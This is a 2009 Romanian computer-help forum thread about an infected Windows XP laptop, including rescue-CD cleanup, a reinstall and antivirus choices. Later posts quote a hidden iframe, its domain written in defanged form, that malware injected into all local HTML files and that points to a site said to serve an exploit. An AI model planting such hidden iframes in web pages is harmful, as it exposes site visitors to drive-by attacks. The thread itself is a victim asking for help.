Jump to content

SUBIECTE NOI
« 1 / 5 »
RSS
Bitdefender Total Security ș...

casa verde 2024

Intrerupator cu N - doza doar cu ...

Incalzire casa fara gaz/lemne
 Incalzire in pardoseala etapizata

Suprataxa card energie?!

Cum era nivelul de trai cam din a...

probleme cu ochelarii
 Impozite pe proprietati de anul v...

teava rezistenta panou apa calda

Acces in Curte din Drum National

Sub mobila de bucatarie si sub fr...
 Rezultat RMN

Numar circuite IPAT si prindere t...

Pareri brgimportchina.ro - teapa ...

Lucruri inaintea vremurilor lor
 

Nu pot accesa siteuri antivirus

- - - - -
  • Please log in to reply
23 replies to this topic

#1
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006
Salut,
Am PC-ul virtusat de pe net.
Am sters cativa virusi cu nod32 -trial.
Am sters cu killbox fiserul services.exe din Win....nu pe cel cu acelasi nume din win\sistem32. Dupa acea procesorul a revenit la o functionare normala...sub 100/%.

Totusi nu pot sa ma conectez prin net la siteuri de antivirus, nici microsoft. Alte conexiuni merg ok.

In plus, nu pot activa firewall-ul default al windows-ului.


Ce sa mai fac?...sunt sigur ca am si alti virusi pe PC fisere /registry.

S.O.: XP home licentiat,  IE 6, Default browser Firefox upgardat la zi. Conexiune RDS cable.


Cu multumiri,

Gabi

Edited by gabicen, 07 February 2009 - 01:17.


#2
E_manuel1

E_manuel1

    Active Member

  • Grup: Members
  • Posts: 1,478
  • Înscris: 09.12.2007
Urmeaza te rog indicatiile de Aici iar in caz ca nu reusesti ori ai nevoie de alte sfaturi te rugam sa revi aici.

Edited by crysty2k5, 07 February 2009 - 05:48.
update link


#3
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 E_manuel1, on Feb 7 2009, 03:06, said:

Urmeaza te rog indicatiile de Aici iar in caz ca nu reusesti ori ai nevoie de alte sfaturi te rugam sa revi aici.

Salut...am urmat indicatille din link dar fara rezultat pozitiv.

Am intarziat cu raspunsul pt ca am mai facut cateva "sapaturi" prin PC...fara rezultate.
Alte probleme gasite, eliminate sau existente:

In administrative tools-->..event viewer am gasit niste warning-uri:
- Event ID - 63: A provider, HiPerfCooker_v1, has been registered in the WMI namespace, Root\WMI, to use the LocalSystem account. - This account id privileged and the provider may cause a security violation if not corecctly impersonate the user request...
- Event ID - 4353;
- Event ID - 4356;
- Event ID - 615;

- Event ID - 7028: The rjgjyutpfqeu Registry key denied acces to system account programs so the serevice control manager took ownership of the theregystry key. - am sters keya respectiva din reg si toate referirile la ea.

Acum in reg mai am o cheie suspecta pe care nu pot sa o steg (optiunile de accers la ea sunt toate bifate si gri - nu pot fi modificate)...LEGACY_PCUAELUT - rnegijvff - cum o sterg?

Am mai sters dupa sapaturi incrucisate si un hhldkawq.sys din sistem32\drivers\...

Am scanat cu nod32 trial, Spyware terminator si Spyboot Search & destroy calculatorul, am gasit mai muti virusi si i-am sters (zic eu...)

In prezent:

Unele programe de pe HDD au .exe-ul defect, sau virusat si nu se lanseaza - de ex un uninstaler.

Help si suport center tot nu se lanseaza - Task manager se vede ca se lanseaza  HelpCtr.exe care imi incarca brusc procesorul la 60%.
Dupa ce fac end task - procesorul revine la normal.

Win firewall - arata pornit automat in "services" daca vreau sa-l pun pe ON/OFF din nu pot sa accesez aceste doua butoane radio sunt gri amandoua iar butonul off este activat.
In plus nu am gasit nici o referire la firewall in registry.

Astazi m-am conectat la net - primul mesaj PE CARE L-AM VAZUT A FOST CA LICENTA LA NOD 32 - trial! a expirat.
Pe net am putut naviga dar nu am putut deschide siteuri de antivirus si asemenea.
Dupa cateva minute m-am deculpat, an dezinstalat NOD32 si l-am reinstalat - merge ok numai ca nu m-am mai cuplat la net.
Mi-a aparut un folder RECYCLER in root.

In concluzie sunt cam de unde am plecat.
Ce sa mai fac?
Nu ma deranzeaza sa formatez discul ...daca se rezolva problema sigur.
Nu sunt specialist in virus si mreg pe bajbaite.

Acest text l-am trimis de pe alt calculator nu de pe cel infectat.

Cu multumiri

Edited by gabicen, 09 February 2009 - 18:10.


#4
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Descarca Avira RescueCD de aici: http://dlpro.antivir...cd/rescuecd.iso, arde-l pe un CD si restarteaza PC-ul cu CD-ul in unitatea CD-ROM. Booteaza de pe el, configureaza-l sa stearga\redenumeasca infectiile gasite si apoi porneste-l.

#5
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 crysty2k5, on Feb 9 2009, 18:08, said:

Descarca Avira RescueCD de aici: http://dlpro.antivir...cd/rescuecd.iso, arde-l pe un CD si restarteaza PC-ul cu CD-ul in unitatea CD-ROM. Booteaza de pe el, configureaza-l sa stearga\redenumeasca infectiile gasite si apoi porneste-l.

ok...

#6
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 crysty2k5, on Feb 9 2009, 18:08, said:

Descarca Avira RescueCD de aici: http://dlpro.antivir...cd/rescuecd.iso, arde-l pe un CD si restarteaza PC-ul cu CD-ul in unitatea CD-ROM. Booteaza de pe el, configureaza-l sa stearga\redenumeasca infectiile gasite si apoi porneste-l.


L-am descarcat si ars - dar este pentru Linux iar eu am XP Home...
Pe site la Avira n-am gasit ceva asemanator pt XP...rescue cd de pe care sa fac bootare ...
Alta varianta??...

#7
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Bootezi de pe el ;)

Asta e si faza !

Edited by crysty2k5, 11 September 2011 - 17:49.


#8
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 crysty2k5, on Feb 9 2009, 20:36, said:

Bootezi de pe el ;)

Asta e si faza !

OK...m-a derutat pinguinul cara aparea in stanga sus pe monitor... :)
Am bootat laptopul de pe el si mi-a gasit vreo 120+ de fisere infectate.

In plus am vrut sa utilizez nero pentru salavarea datelor...nu merge. Am incercat sa-l relinstalez  -la un moment dat zicea ca fiserul .exe este corupt si nu poate continua instalarea. La fel si irfan, BSPlayer, si multe altele.
Drept urmare am folosit Record now! de la Sonic care il aveam pe laptop HP default ca sa-mi salvez toate fiserele pe CD. Interesant este ca Recordnow! nu a fost virusat...si am copiat tot ce vroiam pe cd- uri.
-----------

ACUM am win XP reinstalat cu formatare si partitonare HDD.
In plus am o garmada de cd-uri cu diverse fisere copiate din laptop.
Pe laptop am instalat si ruleaza Avira antivir Personal  - free.

Trebuie sa-mi copiez totusi niste fisere de pe CD-uri.
Avira este suficient ca sa scanez CD-urile de eventuali virusi luati prin copiere fisere?

Care este cea m-ai buna solutie antivirus? Avira, NOD32, BITDEFENDER?

Edited by crysty2k5, 11 September 2011 - 17:49.


#9
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Cel mai bun pe 2008 a fost Avira. Ai facut o alegere buna ;)

Daca mai ai intrebari/probleme revino aici ;)

#10
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 crysty2k5, on Feb 12 2009, 10:59, said:

Cel mai bun pe 2008 a fost Avira. Ai facut o alegere buna ;)

Daca mai ai intrebari/probleme revino aici ;)


Multumesc pentru asistenta...

Avira free mi-a detectat o multime de fisere infectate pe cd-urile salvate de pe laptop.
Erau fisere de tip *.exe modificate, dimensinea fiserelor era aceeasi cu cele originale, data fiserului era anul 2011 sau asemenea.

Jigodia de virus(si) mi-a(au) infectat si kitul de instalare pentru serverul Wamp.
Am redownloadat si reinstalat serverul wamp si in urmatoarerele zile o sa reinstalez zencard iar apoi o sa vad daca pot sa recuperez ceva din baza de date, setari, modificari,  pentru e-comerce la care lucrez...

Sper sa nu mai am probleme cu virusii ca sa revin aici...HI!

#11
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Cu placere.

#12
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 crysty2k5, on Feb 12 2009, 10:59, said:

Cel mai bun pe 2008 a fost Avira. Ai facut o alegere buna ;)

Daca mai ai intrebari/probleme revino aici ;)

Am reusit sa instalez wamp-ul si sa recuperez datele din zencart :) ...dupa infectarea pe care am descris-o.
De pe calculatorul virusat am copiat diverse fisere *.html.
---------


VIRUSARE fisere *.HTML?!

Deocamdata site-ul meu activ este facut cu NVU :(

Incercand sa editez una din paginile mele *.html de pe hard disk, NVU imi zicea ca acea pagina nu poate fi editata.
Am privit in codul html al pagini si la sfarsit avea urmatoarea "insertie":

""<iframe src="http://www(punct)tEenPassage(punct)com/rc/" style="display:none"></iframe>""


</body>
</html>

Am strers ""...."" si am putut sa editez fiserul.

Apoi am inceput sa "caut" prin toate fiserele  *.htm sau *.html pe care le copiasem de pe calculatorul infectat...
Toate aveau la sfarsit aceasi "insertie" !

Ce virus poate "cauta" pe HDD fisere *.html si sa le modifice?
In plus, ce poate face, cum actioneaza ""   <iframe src="http://www(punct)tEenPassage(punct)com/rc/" style="display:none"></iframe>   ""???


Gabi

P.S.  - nu am fost curios sa accesez siteul din inserie si nici nu navighez pe site-uri porn.

#13
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Site-ul respectiv e raportat ca periculos.

Daca incerci sa intrii de pe Firefox pe el te antioneaza.

Si contine un exploit. ( http://en.wikipedia....puter_security) )

O fi fost o vulnerabilitate in HTML/CSS sau la host pe server si te-ai ales cu el pe site :)

Edited by crysty2k5, 27 February 2009 - 23:09.


#14
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 crysty2k5, on Feb 27 2009, 22:06, said:

Site-ul respectiv e raportat ca periculos.

Daca incerci sa intrii de pe Firefox pe el te antioneaza.

Si contine un exploit. ( http://en.wikipedia....puter_security) )

O fi fost o vulenrabilitate in HTML/CSS sau la host pe server si te-ai ales cu el pe site :)

Probabil ca este periculos...nu l-am incercat.

Chestia ca este ca la toate fiserele *.html care le aveam PE HDD s-a adaugat insertia de care vorbeam...inclusiv la paginile web salvate din Firefox ca pagina web completa...

Nu ma pricep la virusi...doar am vrut sa semnalez cat de "adanc" se pot virusa niste fisere din HDD.

Gabi

#15
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Te sfatuiesc sa nu intrii acolo ca e periculos :)

Au mai fost ceva de gen pe aici rezultat in urma unei vulnerabilitati in Joomla :)

#16
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 crysty2k5, on Feb 27 2009, 23:10, said:

Te sfatuiesc sa nu intrii acolo ca e periculos :)

Au mai fost ceva de gen pe aici rezultat in urma unei vulnerabilitati in Joomla :)

Nici nu mi-am propus sa intru pe "acolo".

Pe mine ma interesa (sunt curios) cu ce virus m-am pricopsit, (inainte formatare HDD)... virus care cauta pe HDD fisere *.htm(l) si le modifica...Fiserele htm(l) au fost modificate de un virus numai pe calculatorul de acasa...nu si pe serverul pe care am site-ul gazduit.

#17
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Cand ai mai facut update la site, nu ai descarca de pe server, ai modificat si ai urcat la loc ? :)

Edited by crysty2k5, 28 February 2009 - 00:49.


#18
gabicen

gabicen

    Senior Member

  • Grup: Senior Members
  • Posts: 8,854
  • Înscris: 27.06.2006

 crysty2k5, on Feb 28 2009, 00:48, said:

Cand ai mai facut update la site, nu ai descarca de pe server, ai modificat si ai urcat la loc ? :)


Nu...siteul html il am sub forma de fisere pe PC.
Fac update la fiserele html cu un editor WYSIWYG - (NVU) si apoi le uploadez (FTP) pe server...
Niciodata nu downloadez fisere de pe server ca sa le upgradez.

Anunturi

Second Opinion Second Opinion

Folosind serviciul second opinion ne puteți trimite RMN-uri, CT -uri, angiografii, fișiere .pdf, documente medicale.

Astfel vă vom putea da o opinie neurochirurgicală, fără ca aceasta să poată înlocui un consult de specialitate. Răspunsurile vor fi date prin e-mail în cel mai scurt timp posibil (de obicei în mai putin de 24 de ore, dar nu mai mult de 48 de ore). Second opinion – Neurohope este un serviciu gratuit.

www.neurohope.ro

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Forumul Softpedia foloseste "cookies" pentru a imbunatati experienta utilizatorilor Accept
Pentru detalii si optiuni legate de cookies si datele personale, consultati Politica de utilizare cookies si Politica de confidentialitate